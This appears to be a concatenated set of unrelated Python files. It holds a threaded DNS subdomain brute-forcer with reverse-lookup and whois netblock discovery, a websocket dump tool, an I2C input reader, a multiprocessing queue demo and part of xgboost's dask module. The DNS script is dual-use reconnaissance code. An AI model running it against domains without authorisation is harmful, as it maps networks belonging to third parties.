    Brute force DNS records for a name.

    Look for A, AAAA, and CNAME records associated with the given word.
    Worker thread body for parallel(): consumes words from `word_queue` until
    it is empty or the `fin` event is set, appending (fqdn, IPAddress) pairs
    to the shared module-level `records['forward']` list.
    """
    # NOTE: Event.isSet() is the legacy alias of is_set()
    while not fin.isSet():
        # Get a new word to test, if there are no more words exit the thread.
        try:
            word = word_queue.get(timeout=1)
        except queue.Empty:
            return
        # Get A and AAAA records
        fqdn = '{0}.{1}'.format(word, records['domain'])
        ips = resolve(fqdn)
        ips.extend(resolve(fqdn, rtype='AAAA'))
        for ip in ips:
            records['forward'].append((fqdn, netaddr.IPAddress(ip)))
        # Look for CNAME records
        names = resolve(fqdn, rtype='CNAME')
        for name in names:
            # Skip FQDN CNAMEs
            if name.endswith('.'):
                continue
            ips = resolve(name)
            for ip in ips:
                records['forward'].append((name, netaddr.IPAddress(ip)))
def rev_lookup(fin, address_queue):
    """
    Reverse lookup

    Perform a reverse lookup of an IP address and update the reverse dict.
    Worker thread body for parallel(): consumes addresses from `address_queue`
    until empty or `fin` is set, appending (address, ptr_name) pairs to the
    shared module-level `records['reverse']` list.
    """
    while not fin.isSet():
        # Get a new address to test, if there are no more addresses exit the
        # thread.
        try:
            addr = address_queue.get(timeout=1)
        except queue.Empty:
            return  # No more addresses, exit thread.
        # Convert the IP to a PTR name.
        revip = dns.reversename.from_address(str(addr))
        # Resolve the PTR name.
        names = resolve(revip, 'PTR')
        for name in names:
            records['reverse'].append((addr, name))
def reverse(addresses, netblocks):
    """
    Reverse lookups

    Kick off parallel reverse lookups for every IP address gathered so far,
    plus the full contents of any netblock no larger than BLOCK_SIZE.
    """
    ips = [pair[1] for pair in addresses]
    small_blocks = (entry[0] for entry in netblocks if entry[0].size <= BLOCK_SIZE)
    for block in small_blocks:
        ips.extend(block)
    # de-duplicate before fanning out to worker threads
    parallel(rev_lookup, set(ips))
def netblock(addresses):
    """
    Find the netblocks that our IP addresses belong to.

    Before doing a whois lookup for the netblock see if the IP address is
    already in our current netblocks. Results are appended to the shared
    module-level records['netblocks'] as (IPNetwork, name) tuples.
    """
    for ip in set([a[1] for a in addresses]):
        # If the IP is in one of our netblocks then move on.
        found = False
        for block in records['netblocks']:
            if ip in block[0]:
                found = True
                break
        if found:
            continue
        # If the ip is not in one of our netblocks then look up the netblock
        # associated with the IP.
        network = None
        try:
            resp = ipwhois.IPWhois(ip).lookup_rdap()
            network = resp['network']
        except Exception:
            # whois failures are expected for some ranges and are best-effort;
            # the previous bare `except:` also swallowed KeyboardInterrupt and
            # SystemExit, which broke Ctrl-C handling
            continue
        if network is None:
            continue
        # Process the whois response
        name = network['name']
        if name is None:
            name = 'Unknown'
        # If cidr is present then process it. If it is not present then
        # build the cidr from the range created by the start and end
        # addreses.
        if 'cidr' in network:
            cidrs = network['cidr'].split(', ')
            records['netblocks'].extend([(netaddr.IPNetwork(c), name) for c in cidrs])
        else:
            # renamed from `range`, which shadowed the builtin
            ip_range = netaddr.IPRange(network['start_address'], network['end_address'])
            records['netblocks'].append((ip_range.cidrs()[0], name))
def usage():
    """Print command-line usage and terminate with a non-zero exit status."""
    print('Usage: resolve_mt.py domain.name wordlist')
    sys.exit(1)
if __name__ == '__main__':
    if len(sys.argv) != 3:
        usage()
    wordlist = get_words(sys.argv[2])
    # shared mutable state read/written by the worker functions
    # (brute, rev_lookup, netblock) — they reference `records` as a global
    records = {'domain': sys.argv[1], 'soa': '', 'nservers': [],
        'mailex': [], 'axfr': [], 'forward': [], 'reverse': [],
        'netblocks': []}
    print(records['domain'].upper())
    print('=' * len(records['domain']))
    print('[*] Get SOA record.')
    ans = resolve(records['domain'], rtype='SOA')
    if ans != []:
        # first field of the SOA answer is the primary name server
        ans = ans[0].split()
        records['soa'] = ans[0].rstrip('.')
    print('[*] Getting name servers.')
    records['nservers'] = [n.rstrip('.') for n in resolve(records['domain'], rtype='NS')]
    # Use all name servers to resolve queries
    nservers = []
    for ns in records['nservers']:
        nservers.extend(resolve(ns))
    resolver.nameservers = nservers
    print('[*] Brute forcing domain names.')
    parallel(brute, wordlist)
    print('[*] Getting Net blocks for IP addresses.')
    netblock(records['forward'])
    print('[*] Doing reverse lookups on IP addresses.')
    reverse(records['forward'], records['netblocks'])
    # assemble the plain-text report, section by section
    report = []
    report.append(records['domain'].upper())
    report.append('=' * len(records['domain']))
    report.append('Start of Authority')
    report.append('------------------')
    report.append(records['soa'])
    report.append('')
    report.append('Name Servers')
    report.append('------------')
    report.extend(records['nservers'])
    report.append('')
    report.append('Forward Lookups')
    report.append('---------------')
    report.extend(['{0} - {1}'.format(r[0], r[1]) for r in sorted(set(records['forward']))])
    report.append('')
    report.append('Reverse Lookups')
    report.append('---------------')
    report.extend(['{0} - {1}'.format(r[0], r[1]) for r in sorted(set(records['reverse']))])
    report.append('')
    # NOTE(review): a `with open(...)` block would be safer here
    f = open('{0}.txt'.format(records['domain']), 'w')
    f.write('\n'.join(report))
    f.close()
|
wsdump.py | #!/Users/weiyihu/StudioProjects/team-project-14-djno/backend/virt/bin/python
import argparse
import code
import sys
import threading
import time
import ssl
import gzip
import zlib
import six
from six.moves.urllib.parse import urlparse
import websocket
try:
import readline
except ImportError:
pass
def get_encoding():
    """Return the lower-cased encoding of stdin, defaulting to utf-8."""
    encoding = getattr(sys.stdin, "encoding", "")
    return encoding.lower() if encoding else "utf-8"
# frame opcodes that carry payload data (as opposed to control frames)
OPCODE_DATA = (websocket.ABNF.OPCODE_TEXT, websocket.ABNF.OPCODE_BINARY)
# stdin encoding, resolved once at import time
ENCODING = get_encoding()
class VAction(argparse.Action):
    """argparse action implementing -v / -v N / -vvv style verbosity flags.

    A bare `-v` means level 1; `-v N` parses N as an integer; a run of v's
    (e.g. `-vvv`) yields their count plus one.
    """

    def __call__(self, parser, args, values, option_string=None):
        if values is None:
            level = 1
        else:
            try:
                level = int(values)
            except ValueError:
                level = values.count("v") + 1
        setattr(args, self.dest, level)
def parse_args():
    """Define and parse the command-line interface; return the parsed namespace."""
    parser = argparse.ArgumentParser(description="WebSocket Simple Dump Tool")
    parser.add_argument("url", metavar="ws_url",
        help="websocket url. ex. ws://echo.websocket.org/")
    parser.add_argument("-p", "--proxy",
        help="proxy url. ex. http://127.0.0.1:8080")
    # VAction lets -v take an optional numeric level or counted v's
    parser.add_argument("-v", "--verbose", default=0, nargs='?', action=VAction,
        dest="verbose",
        help="set verbose mode. If set to 1, show opcode. "
        "If set to 2, enable to trace websocket module")
    parser.add_argument("-n", "--nocert", action='store_true',
        help="Ignore invalid SSL cert")
    parser.add_argument("-r", "--raw", action="store_true",
        help="raw output")
    parser.add_argument("-s", "--subprotocols", nargs='*',
        help="Set subprotocols")
    parser.add_argument("-o", "--origin",
        help="Set origin")
    parser.add_argument("--eof-wait", default=0, type=int,
        help="wait time(second) after 'EOF' received.")
    parser.add_argument("-t", "--text",
        help="Send initial text")
    parser.add_argument("--timings", action="store_true",
        help="Print timings in seconds")
    parser.add_argument("--headers",
        help="Set custom headers. Use ',' as separator")
    return parser.parse_args()
class RawInput:
    """Line-input helper that normalizes prompting across Python 2 and 3.

    Lines read from stdin are normalized to UTF-8 bytes: text strings are
    encoded, and (on the Python 2 path) byte strings in another stdin
    encoding are transcoded.
    """
    def raw_input(self, prompt):
        if six.PY3:
            line = input(prompt)
        else:
            # Python 2: raw_input is the builtin line reader
            line = raw_input(prompt)
        if ENCODING and ENCODING != "utf-8" and not isinstance(line, six.text_type):
            line = line.decode(ENCODING).encode("utf-8")
        elif isinstance(line, six.text_type):
            line = line.encode("utf-8")
        return line
class InteractiveConsole(RawInput, code.InteractiveConsole):
    """Interactive console with ANSI-colored output and a persistent '> ' prompt."""
    def write(self, data):
        # clear the current line (\033[2K) and move to line start (\033[E)
        sys.stdout.write("\033[2K\033[E")
        # sys.stdout.write("\n")
        # print the incoming message in blue, then restore default color
        sys.stdout.write("\033[34m< " + data + "\033[39m")
        sys.stdout.write("\n> ")
        sys.stdout.flush()
    def read(self):
        return self.raw_input("> ")
class NonInteractive(RawInput):
    """Plain stdin/stdout console used for --raw mode (no ANSI escapes, no prompt)."""

    def write(self, data):
        # message followed by a newline, flushed immediately
        for chunk in (data, "\n"):
            sys.stdout.write(chunk)
        sys.stdout.flush()

    def read(self):
        return self.raw_input("")
def main():
    """Connect to the websocket URL from the CLI args and run a send/receive loop.

    A daemon thread (recv_ws) prints incoming frames to the chosen console
    while the main thread forwards console input to the socket. Returns on
    Ctrl-C or EOF.
    """
    start_time = time.time()
    args = parse_args()
    if args.verbose > 1:
        websocket.enableTrace(True)
    # options for create_connection, assembled from the CLI flags
    options = {}
    if args.proxy:
        p = urlparse(args.proxy)
        options["http_proxy_host"] = p.hostname
        options["http_proxy_port"] = p.port
    if args.origin:
        options["origin"] = args.origin
    if args.subprotocols:
        options["subprotocols"] = args.subprotocols
    opts = {}
    if args.nocert:
        # disable certificate verification entirely
        opts = {"cert_reqs": ssl.CERT_NONE, "check_hostname": False}
    if args.headers:
        options['header'] = list(map(str.strip, args.headers.split(',')))
    ws = websocket.create_connection(args.url, sslopt=opts, **options)
    if args.raw:
        console = NonInteractive()
    else:
        console = InteractiveConsole()
        print("Press Ctrl+C to quit")
    def recv():
        # receive one frame; answer CLOSE/PING control frames, return (opcode, data)
        try:
            frame = ws.recv_frame()
        except websocket.WebSocketException:
            return websocket.ABNF.OPCODE_CLOSE, None
        if not frame:
            raise websocket.WebSocketException("Not a valid frame %s" % frame)
        elif frame.opcode in OPCODE_DATA:
            return frame.opcode, frame.data
        elif frame.opcode == websocket.ABNF.OPCODE_CLOSE:
            ws.send_close()
            return frame.opcode, None
        elif frame.opcode == websocket.ABNF.OPCODE_PING:
            ws.pong(frame.data)
            return frame.opcode, frame.data
        return frame.opcode, frame.data
    def recv_ws():
        # background loop: decode/decompress incoming data and print it
        while True:
            opcode, data = recv()
            msg = None
            if six.PY3 and opcode == websocket.ABNF.OPCODE_TEXT and isinstance(data, bytes):
                data = str(data, "utf-8")
            if isinstance(data, bytes) and len(data) > 2 and data[:2] == b'\037\213':  # gzip magick
                # best-effort decompression; bare except is deliberate here
                try:
                    data = "[gzip] " + str(gzip.decompress(data), "utf-8")
                except:
                    pass
            elif isinstance(data, bytes):
                try:
                    data = "[zlib] " + str(zlib.decompress(data, -zlib.MAX_WBITS), "utf-8")
                except:
                    pass
            if isinstance(data, bytes):
                data = repr(data)
            if args.verbose:
                msg = "%s: %s" % (websocket.ABNF.OPCODE_MAP.get(opcode), data)
            else:
                msg = data
            if msg is not None:
                if args.timings:
                    console.write(str(time.time() - start_time) + ": " + msg)
                else:
                    console.write(msg)
            if opcode == websocket.ABNF.OPCODE_CLOSE:
                break
    thread = threading.Thread(target=recv_ws)
    thread.daemon = True
    thread.start()
    if args.text:
        ws.send(args.text)
    # foreground loop: forward console input to the socket
    while True:
        try:
            message = console.read()
            ws.send(message)
        except KeyboardInterrupt:
            return
        except EOFError:
            time.sleep(args.eof_wait)
            return
if __name__ == "__main__":
    try:
        main()
    except Exception as e:
        # top-level guard: show a short error message instead of a traceback
        print(e)
|
DigitalInputReader.py | from typing import Callable, Dict, List, Optional
from vosekast_control.connectors import SMBusConnection
import threading
import logging
from vosekast_control.Log import LOGGER
from inspect import iscoroutinefunction
from asyncio import create_task, BaseEventLoop
from time import sleep
from vosekast_control.connectors.AppControl import AppControl
logger = logging.getLogger(LOGGER)
class Callback:
    """Pairs a subscriber callback with the input pin it is bound to."""

    # callable invoked with the pin's new boolean state
    callback: Callable[[bool], None]
    # 1-based pin number this callback listens on
    input_pin: int

    def __init__(self, callback, input_pin) -> None:
        self.input_pin = input_pin
        self.callback = callback
class DigitalInputReaderConnector:
    """Polls an I2C port expander over SMBus and dispatches pin-change callbacks.

    A background thread reads the raw 8-bit input state roughly 10x per
    second and, whenever a pin's (active-low) state changes, invokes the
    callback registered for that pin. Coroutine callbacks are scheduled on
    `event_loop`, which the application must set before starting.
    """
    callbacks: Dict[int, Callback]
    address: int
    counter: int
    event_loop: Optional[BaseEventLoop]

    def __init__(self, address=0x39):
        self.address = address
        self.counter = 0
        self.callbacks = {}
        # last raw byte read from the device; None until the first read
        self.old_state = None
        self._thread = threading.Thread(target=self._loop)
        # must be assigned by the application before async callbacks can run
        self.event_loop = None

    def start(self):
        """Start the background polling thread."""
        logger.info("Start background thread for DigitalInputs.")
        self._thread.start()

    def _loop(self):
        """Poll the device until the application signals termination."""
        while not AppControl.is_terminating():
            try:
                new_state = self._read_state()
                if self.old_state is not None and new_state != self.old_state:
                    self._trigger_callbacks(new_state)
                self.old_state = new_state
                sleep(0.1)
            except Exception as err:
                logger.warning(f'Error in digital input loop: {err}')
        logger.info("Stopped background thread for DigitalInputs.")

    def _trigger_callbacks(self, new_state):
        """Invoke the callback of every pin whose state differs from old_state."""
        # FIX: was range(1, 8), which silently skipped pin 8 even though
        # digital_read() treats pins 1-8 as valid.
        for pin in range(1, 9):
            pin_state = self._get_pin_state(pin, new_state)
            if pin_state == self._get_pin_state(pin, self.old_state):
                continue
            callback = self.callbacks.get(pin)
            if callback is None:
                continue
            if iscoroutinefunction(callback.callback):
                if self.event_loop is None:
                    # FIX: previously this warned and then crashed with an
                    # AttributeError on None.create_task; now it skips.
                    logger.warning('DigitalInputReader tries to run a async task, but has no event loop reference.')
                    continue
                self.event_loop.create_task(callback.callback(pin_state))
            else:
                callback.callback(pin_state)

    def _get_pin_state(self, pin, bin_state):
        """Extract pin (1-8) from a raw state byte; inputs are inverted (active-low)."""
        pin_state = 1 ^ (1 & (bin_state >> (pin - 1)))
        return pin_state == 1

    def _read_state(self) -> int:
        """Read the raw 8-bit input byte from the device over SMBus."""
        state_reading = SMBusConnection.smbus.read_byte(self.address)
        return state_reading

    def digital_read(self, pin: int) -> bool:
        """Read a single pin's current (active-low) state; valid pins are 1-8."""
        if pin >= 9 or pin <= 0:
            raise Exception("Pin is out of Range. Valid Pins are 1-8")
        # reuse the shared bit-extraction helper instead of duplicating it
        return self._get_pin_state(pin, self._read_state())

    def add_callback(self, input_pin: int, callback: Callable[[bool], None]):
        """Register (or replace) the callback for a pin."""
        self.callbacks[input_pin] = Callback(callback, input_pin)

    def clear_callback(self, input_pin: int):
        """Remove the callback registered for a pin (KeyError if none exists)."""
        del self.callbacks[input_pin]

    def clear_callbacks(self):
        """Remove all registered callbacks."""
        self.callbacks = {}
# module-level singleton shared by the rest of the application
DigitalInputReader = DigitalInputReaderConnector()
|
py_queue.py | #!usr/bin/env python
# coding=utf-8
import time
import multiprocessing
def write(queue):
    """Put a fixed series of integers on *queue*, pausing 3s between items.

    FIX: the Python-2-only `print x` statement form was replaced with
    print() calls, which behave identically on Python 2 and 3 here.
    """
    vals = [1, 2, 3, 4, 5, 6]
    for v in vals:
        print('Put %s to queue...' % v)
        queue.put(v)
        time.sleep(3)
def read(queue):
    """Consume and print values from *queue* forever (blocking get).

    FIX: Python-2-only `print x` statement converted to a print() call.
    Runs until the hosting process is terminated.
    """
    while 1:
        value = queue.get(True)
        print('Get %s from queue.' % value)
# NOTE(review): `pool` is created but never used — looks like a leftover
pool = multiprocessing.Pool()
queue = multiprocessing.Queue()
# producer and consumer processes sharing the multiprocessing queue
pw = multiprocessing.Process(target=write, args=(queue,))
pr = multiprocessing.Process(target=read, args=(queue,))
pw.start()
pr.start()
# wait for the producer to finish, then kill the infinitely-looping consumer
pw.join()
pr.terminate()
|
dask.py | # pylint: disable=too-many-arguments, too-many-locals
"""Dask extensions for distributed training. See
https://xgboost.readthedocs.io/en/latest/tutorials/dask.html for simple
tutorial. Also xgboost/demo/dask for some examples.
There are two sets of APIs in this module, one is the functional API including
``train`` and ``predict`` methods. Another is stateful Scikit-Learner wrapper
inherited from single-node Scikit-Learn interface.
The implementation is heavily influenced by dask_xgboost:
https://github.com/dask/dask-xgboost
"""
import platform
import logging
from collections import defaultdict
from threading import Thread
import numpy
from . import rabit
from .compat import DASK_INSTALLED
from .compat import distributed_get_worker, distributed_wait, distributed_comm
from .compat import da, dd, delayed, get_client
from .compat import sparse, scipy_sparse
from .compat import PANDAS_INSTALLED, DataFrame, Series, pandas_concat
from .compat import CUDF_INSTALLED, CUDF_DataFrame, CUDF_Series, CUDF_concat
from .core import DMatrix, Booster, _expect
from .training import train as worker_train
from .tracker import RabitTracker
from .sklearn import XGBModel, XGBClassifierBase, xgboost_model_doc
# Current status is considered as initial support, many features are
# not properly supported yet.
#
# TODOs:
# - Callback.
# - Label encoding.
# - CV
# - Ranking
def _start_tracker(host, n_workers):
    """Start a Rabit tracker on *host* and return the env vars workers need."""
    env = {'DMLC_NUM_WORKER': n_workers}
    rabit_context = RabitTracker(hostIP=host, nslave=n_workers)
    # slave_envs() tells each worker how to connect back to the tracker.
    env.update(rabit_context.slave_envs())
    rabit_context.start(n_workers)
    # Join in a daemon thread so the tracker never blocks interpreter exit.
    thread = Thread(target=rabit_context.join)
    thread.daemon = True
    thread.start()
    return env
def _assert_dask_support():
    """Raise ImportError unless dask is installed; warn when on Windows."""
    if not DASK_INSTALLED:
        raise ImportError(
            'Dask needs to be installed in order to use this module')
    if platform.system() != 'Windows':
        return
    warning = ('Windows is not officially supported for dask/xgboost,'
               ' contribution are welcomed.')
    logging.warning(warning)
class RabitContext:
    '''A context controlling rabit initialization and finalization.'''
    def __init__(self, args):
        # `args` are the encoded DMLC_* env entries from `_get_rabit_args`.
        self.args = args

    def __enter__(self):
        # Join the rabit collective for the duration of the block.
        rabit.init(self.args)
        logging.debug('-------------- rabit say hello ------------------')

    def __exit__(self, *args):
        # Always leave the collective, even if the body raised.
        rabit.finalize()
        logging.debug('--------------- rabit say bye ------------------')
def concat(value):
    '''Concatenate a list of partition payloads along the row axis.

    Dispatches on the type of the first element (numpy, scipy sparse,
    pydata sparse, pandas, cuDF).  To be replaced with a dask builtin.
    '''
    if isinstance(value[0], numpy.ndarray):
        return numpy.concatenate(value, axis=0)
    if scipy_sparse and isinstance(value[0], scipy_sparse.spmatrix):
        return scipy_sparse.vstack(value, format='csr')
    if sparse and isinstance(value[0], sparse.SparseArray):
        return sparse.concatenate(value, axis=0)
    if PANDAS_INSTALLED and isinstance(value[0], (DataFrame, Series)):
        return pandas_concat(value, axis=0)
    if CUDF_INSTALLED and isinstance(value[0], (CUDF_DataFrame, CUDF_Series)):
        return CUDF_concat(value, axis=0)
    # Fall back to dask.dataframe's concat for anything else.
    return dd.multi.concat(list(value), axis=0)
def _xgb_get_client(client):
'''Simple wrapper around testing None.'''
ret = get_client() if client is None else client
return ret
def _get_client_workers(client):
workers = client.scheduler_info()['workers']
return workers
def _assert_client(client):
    '''Raise TypeError unless *client* is a distributed Client or None.'''
    allowed = (type(get_client()), type(None))
    if not isinstance(client, allowed):
        raise TypeError(_expect(list(allowed), type(client)))
class DaskDMatrix:
    # pylint: disable=missing-docstring, too-many-instance-attributes
    '''DMatrix holding on references to Dask DataFrame or Dask Array. Constructing
    a `DaskDMatrix` forces all lazy computation to be carried out. Wait for
    the input data explicitly if you want to see actual computation of
    constructing `DaskDMatrix`.

    Parameters
    ----------
    client: dask.distributed.Client
        Specify the dask client used for training. Use default client
        returned from dask if it's set to None.
    data : dask.array.Array/dask.dataframe.DataFrame
        data source of DMatrix.
    label: dask.array.Array/dask.dataframe.DataFrame
        label used for training.
    missing : float, optional
        Value in the input data (e.g. `numpy.ndarray`) which needs
        to be present as a missing value. If None, defaults to np.nan.
    weight : dask.array.Array/dask.dataframe.DataFrame
        Weight for each instance.
    feature_names : list, optional
        Set names for features.
    feature_types : list, optional
        Set types for features
    '''
    # Class-level defaults so objects pickled by a previous version (which
    # lacked these attributes) still unpickle correctly.
    _feature_names = None  # for previous version's pickle
    _feature_types = None

    def __init__(self,
                 client,
                 data,
                 label=None,
                 missing=None,
                 weight=None,
                 feature_names=None,
                 feature_types=None):
        _assert_dask_support()
        _assert_client(client)
        self._feature_names = feature_names
        self._feature_types = feature_types
        self._missing = missing
        if len(data.shape) != 2:
            raise ValueError(
                'Expecting 2 dimensional input, got: {shape}'.format(
                    shape=data.shape))
        if not isinstance(data, (dd.DataFrame, da.Array)):
            raise TypeError(_expect((dd.DataFrame, da.Array), type(data)))
        if not isinstance(label, (dd.DataFrame, da.Array, dd.Series,
                                  type(None))):
            raise TypeError(
                _expect((dd.DataFrame, da.Array, dd.Series), type(label)))
        # worker address -> list of partition futures; filled in by
        # `map_local_data` below.
        self.worker_map = None
        self.has_label = label is not None
        self.has_weights = weight is not None
        client = _xgb_get_client(client)
        # Force computation of the lazy collections and record which worker
        # ended up holding which partition.
        client.sync(self.map_local_data, client, data, label, weight)

    async def map_local_data(self, client, data, label=None, weights=None):
        '''Obtain references to local data.'''

        def inconsistent(left, left_name, right, right_name):
            # Error text used when X/label/weight partition counts differ.
            msg = 'Partitions between {a_name} and {b_name} are not ' \
                'consistent: {a_len} != {b_len}. ' \
                'Please try to repartition/rechunk your data.'.format(
                    a_name=left_name, b_name=right_name, a_len=len(left),
                    b_len=len(right)
                )
            return msg

        def check_columns(parts):
            # x is required to be 2 dim in __init__
            assert parts.ndim == 1 or parts.shape[1], 'Data should be' \
                ' partitioned by row. To avoid this specify the number' \
                ' of columns for your dask Array explicitly. e.g.' \
                ' chunks=(partition_size, X.shape[1])'

        # Pin the collections in distributed memory before taking futures.
        data = data.persist()
        if label is not None:
            label = label.persist()
        if weights is not None:
            weights = weights.persist()
        # Breaking data into partitions, a trick borrowed from dask_xgboost.
        # `to_delayed` downgrades high-level objects into numpy or pandas
        # equivalents.
        X_parts = data.to_delayed()
        if isinstance(X_parts, numpy.ndarray):
            check_columns(X_parts)
            X_parts = X_parts.flatten().tolist()
        if label is not None:
            y_parts = label.to_delayed()
            if isinstance(y_parts, numpy.ndarray):
                check_columns(y_parts)
                y_parts = y_parts.flatten().tolist()
        if weights is not None:
            w_parts = weights.to_delayed()
            if isinstance(w_parts, numpy.ndarray):
                check_columns(w_parts)
                w_parts = w_parts.flatten().tolist()
        parts = [X_parts]
        if label is not None:
            assert len(X_parts) == len(
                y_parts), inconsistent(X_parts, 'X', y_parts, 'labels')
            parts.append(y_parts)
        if weights is not None:
            assert len(X_parts) == len(
                w_parts), inconsistent(X_parts, 'X', w_parts, 'weights')
            parts.append(w_parts)
        # Zip X/y/w so each element is one row-aligned (X[, y[, w]]) tuple,
        # then materialise all tuples as futures on the cluster.
        parts = list(map(delayed, zip(*parts)))
        parts = client.compute(parts)
        await distributed_wait(parts)  # async wait for parts to be computed
        for part in parts:
            assert part.status == 'finished'
        # Ask the scheduler where each partition landed, so training can be
        # dispatched to the worker that already holds the data.
        key_to_partition = {part.key: part for part in parts}
        who_has = await client.scheduler.who_has(
            keys=[part.key for part in parts])
        worker_map = defaultdict(list)
        for key, workers in who_has.items():
            worker_map[next(iter(workers))].append(key_to_partition[key])
        self.worker_map = worker_map

    def get_worker_parts(self, worker):
        '''Get mapped parts of data in each worker.'''
        list_of_parts = self.worker_map[worker.address]
        assert list_of_parts, 'data in ' + worker.address + ' was moved.'
        assert isinstance(list_of_parts, list)
        # `get_worker_parts` is launched inside worker. In dask side
        # this should be equal to `worker._get_client`.
        client = get_client()
        list_of_parts = client.gather(list_of_parts)
        # Each element of list_of_parts is an (X[, y[, w]]) tuple; unzip it
        # into per-field sequences.
        if self.has_label:
            if self.has_weights:
                data, labels, weights = zip(*list_of_parts)
            else:
                data, labels = zip(*list_of_parts)
                weights = None
        else:
            data = [d[0] for d in list_of_parts]
            labels = None
            weights = None
        return data, labels, weights

    def get_worker_data(self, worker):
        '''Get data that local to worker.

        Parameters
        ----------
        worker: The worker used as key to data.

        Returns
        -------
        A DMatrix object.
        '''
        if worker.address not in set(self.worker_map.keys()):
            # This worker holds no partition; hand back an empty DMatrix so
            # collective rabit calls still line up across workers.
            msg = 'worker {address} has an empty DMatrix. ' \
                'All workers associated with this DMatrix: {workers}'.format(
                    address=worker.address,
                    workers=set(self.worker_map.keys()))
            logging.warning(msg)
            d = DMatrix(numpy.empty((0, 0)),
                        feature_names=self._feature_names,
                        feature_types=self._feature_types)
            return d
        data, labels, weights = self.get_worker_parts(worker)
        data = concat(data)
        if self.has_label:
            labels = concat(labels)
        else:
            labels = None
        if self.has_weights:
            weights = concat(weights)
        else:
            weights = None
        dmatrix = DMatrix(data,
                          labels,
                          weight=weights,
                          missing=self._missing,
                          feature_names=self._feature_names,
                          feature_types=self._feature_types)
        return dmatrix

    def get_worker_data_shape(self, worker):
        '''Get the shape of data X in each worker.'''
        data, _, _ = self.get_worker_parts(worker)
        shapes = [d.shape for d in data]
        rows = 0
        cols = 0
        for shape in shapes:
            rows += shape[0]
            c = shape[1]
            # Every partition must agree on the column count.
            assert cols in (0, c), 'Shape between partitions are not the' \
                ' same. Got: {left} and {right}'.format(left=c, right=cols)
            cols = c
        return (rows, cols)
def _get_rabit_args(worker_map, client):
    '''Get rabit context arguments from data distribution in DaskDMatrix.'''
    host = distributed_comm.get_address_host(client.scheduler.address)
    # The tracker runs on the scheduler so every worker can reach it; one
    # slot per entry in worker_map.
    env = client.run_on_scheduler(_start_tracker, host.strip('/:'),
                                  len(worker_map))
    # rabit expects b'KEY=VALUE' byte strings.
    rabit_args = [('%s=%s' % item).encode() for item in env.items()]
    return rabit_args
# train and predict methods are supposed to be "functional", which meets the
# dask paradigm. But as a side effect, the `evals_result` in single-node API
# is no longer supported since it mutates the input parameter, and it's not
# intuitive to sync the mutation result. Therefore, a dictionary containing
# evaluation history is instead returned.
def train(client, params, dtrain, *args, evals=(), **kwargs):
    '''Train XGBoost model.

    Parameters
    ----------
    client: dask.distributed.Client
        Specify the dask client used for training. Use default client
        returned from dask if it's set to None.
    \\*\\*kwargs:
        Other parameters are the same as `xgboost.train` except for
        `evals_result`, which is returned as part of function return value
        instead of argument.

    Returns
    -------
    results: dict
        A dictionary containing trained booster and evaluation history.
        `history` field is the same as `eval_result` from `xgboost.train`.

        .. code-block:: python

            {'booster': xgboost.Booster,
             'history': {'train': {'logloss': ['0.48253', '0.35953']},
                         'eval': {'logloss': ['0.480385', '0.357756']}}}
    '''
    _assert_dask_support()
    _assert_client(client)
    if 'evals_result' in kwargs.keys():
        raise ValueError(
            'evals_result is not supported in dask interface.',
            'The evaluation history is returned as result of training.')

    client = _xgb_get_client(client)
    workers = list(_get_client_workers(client).keys())

    # Start the rabit tracker and collect the env every worker needs to join
    # the collective.
    rabit_args = _get_rabit_args(workers, client)

    def dispatched_train(worker_addr):
        '''Perform training on a single worker.'''
        logging.info('Training on %s', str(worker_addr))
        worker = distributed_get_worker()
        with RabitContext(rabit_args):
            local_dtrain = dtrain.get_worker_data(worker)

            local_evals = []
            if evals:
                for mat, name in evals:
                    if mat is dtrain:
                        # Reuse the already-built local DMatrix when an
                        # evaluation set is the training set itself.
                        local_evals.append((local_dtrain, name))
                        continue
                    local_mat = mat.get_worker_data(worker)
                    local_evals.append((local_mat, name))

            local_history = {}
            local_param = params.copy()  # just to be consistent
            bst = worker_train(params=local_param,
                               dtrain=local_dtrain,
                               *args,
                               evals_result=local_history,
                               evals=local_evals,
                               **kwargs)
            ret = {'booster': bst, 'history': local_history}
            if local_dtrain.num_row() == 0:
                # Workers without data still joined the collective but
                # contribute no result.
                ret = None
            return ret

    # pure=False forces one task per worker instead of de-duplicating them.
    futures = client.map(dispatched_train,
                         workers,
                         pure=False,
                         workers=workers)
    results = client.gather(futures)
    # All non-None results are equivalent after rabit sync; return the first.
    return list(filter(lambda ret: ret is not None, results))[0]
def predict(client, model, data, *args):
    '''Run prediction with a trained booster.

    .. note::

        Only default prediction mode is supported right now.

    Parameters
    ----------
    client: dask.distributed.Client
        Specify the dask client used for training. Use default client
        returned from dask if it's set to None.
    model: A Booster or a dictionary returned by `xgboost.dask.train`.
        The trained model.
    data: DaskDMatrix
        Input data used for prediction.

    Returns
    -------
    prediction: dask.array.Array
    '''
    _assert_dask_support()
    _assert_client(client)
    if isinstance(model, Booster):
        booster = model
    elif isinstance(model, dict):
        booster = model['booster']
    else:
        raise TypeError(_expect([Booster, dict], type(model)))
    if not isinstance(data, DaskDMatrix):
        raise TypeError(_expect([DaskDMatrix], type(data)))

    worker_map = data.worker_map
    client = _xgb_get_client(client)

    rabit_args = _get_rabit_args(worker_map, client)

    def dispatched_predict(worker_id):
        '''Perform prediction on each worker.'''
        logging.info('Predicting on %d', worker_id)
        worker = distributed_get_worker()
        local_x = data.get_worker_data(worker)

        with RabitContext(rabit_args):
            # Skip feature validation when this worker's DMatrix is empty.
            local_predictions = booster.predict(
                data=local_x, validate_features=local_x.num_row() != 0, *args)
            return local_predictions

    futures = client.map(dispatched_predict,
                         range(len(worker_map)),
                         pure=False,
                         workers=list(worker_map.keys()))

    def dispatched_get_shape(worker_id):
        '''Get shape of data in each worker.'''
        logging.info('Trying to get data shape on %d', worker_id)
        worker = distributed_get_worker()
        rows, _ = data.get_worker_data_shape(worker)
        return rows, 1  # default is 1

    # Constructing a dask array from list of numpy arrays
    # See https://docs.dask.org/en/latest/array-creation.html
    futures_shape = client.map(dispatched_get_shape,
                               range(len(worker_map)),
                               pure=False,
                               workers=list(worker_map.keys()))
    shapes = client.gather(futures_shape)
    # Stitch per-worker prediction futures into one 1-D dask array.
    arrays = []
    for i in range(len(futures_shape)):
        arrays.append(da.from_delayed(futures[i], shape=(shapes[i][0], ),
                                      dtype=numpy.float32))
    predictions = da.concatenate(arrays, axis=0)
    return predictions
def _evaluation_matrices(client, validation_set, sample_weights):
    '''Build named validation DMatrix pairs for `train`.

    Parameters
    ----------
    validation_set: list of tuples
        Each tuple contains a validation dataset including input X and
        label y, e.g. ``[(X_0, y_0), (X_1, y_1), ...]``.
    sample_weights: list of arrays
        The weight vector for validation data, or None.

    Returns
